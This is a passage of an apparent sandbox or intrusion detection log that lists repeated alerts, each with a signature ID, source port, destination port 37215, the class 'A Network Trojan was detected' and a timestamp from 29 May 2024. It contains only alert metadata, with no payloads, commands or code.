                SID:2829579
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032819
                SID:2829579
                Source Port:33414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317765
                SID:2835222
                Source Port:40784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013590
                SID:2829579
                Source Port:50040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243598
                SID:2829579
                Source Port:51514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853408
                SID:2829579
                Source Port:47596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793585
                SID:2829579
                Source Port:42520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292871
                SID:2835222
                Source Port:53424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567887
                SID:2829579
                Source Port:44800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522784
                SID:2829579
                Source Port:55908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839810
                SID:2835222
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567658
                SID:2835222
                Source Port:34398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992690
                SID:2829579
                Source Port:57560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208221
                SID:2835222
                Source Port:53370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827421
                SID:2829579
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363140
                SID:2829579
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812866
                SID:2829579
                Source Port:32780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163744
                SID:2835222
                Source Port:38632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694664
                SID:2829579
                Source Port:51244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660314
                SID:2835222
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584524
                SID:2829579
                Source Port:44082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282341
                SID:2835222
                Source Port:36744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500439
                SID:2835222
                Source Port:58028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212238
                SID:2829579
                Source Port:54248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728384
                SID:2835222
                Source Port:42836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282522
                SID:2835222
                Source Port:53704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223776
                SID:2835222
                Source Port:59104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870549
                SID:2829579
                Source Port:48412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023498
                SID:2835222
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025319
                SID:2829579
                Source Port:35108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263630
                SID:2829579
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579294
                SID:2835222
                Source Port:44330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949565
                SID:2829579
                Source Port:48132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.237066
                SID:2835222
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964152
                SID:2835222
                Source Port:44002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223327
                SID:2835222
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655898
                SID:2835222
                Source Port:36662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667372
                SID:2829579
                Source Port:41856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023435
                SID:2829579
                Source Port:48590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675034
                SID:2829579
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435910
                SID:2835222
                Source Port:43172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610996
                SID:2829579
                Source Port:60606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013764
                SID:2835222
                Source Port:33400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667898
                SID:2829579
                Source Port:35060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160043
                SID:2835222
                Source Port:36524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455156
                SID:2835222
                Source Port:47126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763470
                SID:2835222
                Source Port:52716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570694
                SID:2835222
                Source Port:40446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237708
                SID:2829579
                Source Port:37136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026726
                SID:2829579
                Source Port:47338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560991
                SID:2829579
                Source Port:38680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973426
                SID:2835222
                Source Port:37956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701281
                SID:2835222
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902018
                SID:2829579
                Source Port:48376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337089
                SID:2835222
                Source Port:39478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997378
                SID:2835222
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660250
                SID:2829579
                Source Port:58474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501080
                SID:2835222
                Source Port:40610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010982
                SID:2829579
                Source Port:33684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916728
                SID:2835222
                Source Port:43992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931601
                SID:2829579
                Source Port:54802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935749
                SID:2835222
                Source Port:44466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024403
                SID:2829579
                Source Port:47472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624937
                SID:2835222
                Source Port:34428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628145
                SID:2829579
                Source Port:54508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432598
                SID:2835222
                Source Port:45668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466131
                SID:2835222
                Source Port:55518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278402
                SID:2835222
                Source Port:59766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572396
                SID:2829579
                Source Port:33230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863303
                SID:2829579
                Source Port:43938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.369033
                SID:2835222
                Source Port:47750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795496
                SID:2835222
                Source Port:47528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362658
                SID:2829579
                Source Port:36420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414675
                SID:2829579
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335945
                SID:2829579
                Source Port:57174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726194
                SID:2829579
                Source Port:60344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984697
                SID:2835222
                Source Port:55986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784284
                SID:2829579
                Source Port:34976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335068
                SID:2829579
                Source Port:44732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944135
                SID:2829579
                Source Port:41508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960514
                SID:2829579
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976262
                SID:2835222
                Source Port:40866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648340
                SID:2835222
                Source Port:58502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672585
                SID:2835222
                Source Port:42356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859558
                SID:2835222
                Source Port:46010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844573
                SID:2835222
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079149
                SID:2835222
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038207
                SID:2829579
                Source Port:58250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386018
                SID:2835222
                Source Port:52750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000992
                SID:2829579
                Source Port:45570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076497
                SID:2829579
                Source Port:35104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938197
                SID:2829579
                Source Port:58850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272350
                SID:2835222
                Source Port:46822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519064
                SID:2829579
                Source Port:51414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909218
                SID:2829579
                Source Port:37438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009685
                SID:2835222
                Source Port:59566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665839
                SID:2835222
                Source Port:42316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533696
                SID:2829579
                Source Port:60298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782727
                SID:2829579
                Source Port:58358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.359882
                SID:2835222
                Source Port:33788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.098670
                SID:2829579
                Source Port:52538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439989
                SID:2835222
                Source Port:39402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893289
                SID:2829579
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949730
                SID:2835222
                Source Port:53156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559424
                SID:2829579
                Source Port:57670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321081
                SID:2829579
                Source Port:33200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136943
                SID:2835222
                Source Port:54878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652949
                SID:2835222
                Source Port:37262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226787
                SID:2829579
                Source Port:38606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712943
                SID:2835222
                Source Port:50316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950124
                SID:2829579
                Source Port:34258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518454
                SID:2829579
                Source Port:48170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788233
                SID:2829579
                Source Port:42812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584037
                SID:2835222
                Source Port:44202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455018
                SID:2835222
                Source Port:42734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467259
                SID:2835222
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267817
                SID:2835222
                Source Port:45478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263806
                SID:2835222
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282476
                SID:2835222
                Source Port:53540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325203
                SID:2835222
                Source Port:42166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180565
                SID:2829579
                Source Port:56188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363358
                SID:2829579
                Source Port:35190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072774
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324776
                SID:2835222
                Source Port:39232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227701
                SID:2835222
                Source Port:59990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811794
                SID:2835222
                Source Port:45320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359258
                SID:2829579
                Source Port:53070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162848
                SID:2835222
                Source Port:60236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840176
                SID:2829579
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226772
                SID:2835222
                Source Port:37632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269984
                SID:2835222
                Source Port:39072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584076
                SID:2835222
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928014
                SID:2835222
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233332
                SID:2835222
                Source Port:58824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316383
                SID:2829579
                Source Port:44040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509818
                SID:2835222
                Source Port:46432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470341
                SID:2829579
                Source Port:37870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.256989
                SID:2829579
                Source Port:42634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227201
                SID:2835222
                Source Port:41296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879427
                SID:2829579
                Source Port:33456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738405
                SID:2829579
                Source Port:55092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725419
                SID:2829579
                Source Port:51276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782709
                SID:2835222
                Source Port:52810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663539
                SID:2829579
                Source Port:42966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794353
                SID:2829579
                Source Port:43548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787177
                SID:2835222
                Source Port:33668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421931
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163354
                SID:2829579
                Source Port:41408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836357
                SID:2829579
                Source Port:48560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918423
                SID:2835222
                Source Port:34868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269752
                SID:2829579
                Source Port:55004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008476
                SID:2835222
                Source Port:38412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556807
                SID:2835222
                Source Port:46650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419794
                SID:2835222
                Source Port:43250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.618131
                SID:2829579
                Source Port:34296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277415
                SID:2829579
                Source Port:52092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177472
                SID:2829579
                Source Port:40794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026421
                SID:2835222
                Source Port:41150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264841
                SID:2829579
                Source Port:50778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467072
                SID:2835222
                Source Port:35530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184214
                SID:2835222
                Source Port:55324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717152
                SID:2829579
                Source Port:59200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448514
                SID:2829579
                Source Port:49560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824136
                SID:2829579
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022556
                SID:2835222
                Source Port:32794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784370
                SID:2829579
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520698
                SID:2829579
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981336
                SID:2829579
                Source Port:33874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141307
                SID:2829579
                Source Port:47738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738574
                SID:2835222
                Source Port:58964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972250
                SID:2835222
                Source Port:57440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984964
                SID:2829579
                Source Port:34164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613193
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226091
                SID:2835222
                Source Port:57028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333440
                SID:2829579
                Source Port:56928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583019
                SID:2829579
                Source Port:34412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667221
                SID:2829579
                Source Port:42658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275240
                SID:2835222
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899270
                SID:2835222
                Source Port:38530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025743
                SID:2829579
                Source Port:49582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223301
                SID:2835222
                Source Port:51668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885668
                SID:2829579
                Source Port:32904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135572
                SID:2835222
                Source Port:45656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238710
                SID:2829579
                Source Port:46244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014992
                SID:2835222
                Source Port:51096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807204
                SID:2829579
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128843
                SID:2835222
                Source Port:40032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782276
                SID:2829579
                Source Port:39018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584295
                SID:2829579
                Source Port:39368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132547
                SID:2835222
                Source Port:58042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077139
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558101
                SID:2829579
                Source Port:47996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231951
                SID:2829579
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263918
                SID:2829579
                Source Port:50636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567138
                SID:2829579
                Source Port:44194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900286
                SID:2829579
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896425
                SID:2829579
                Source Port:43762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292135
                SID:2829579
                Source Port:50306
                Destination Port:37215
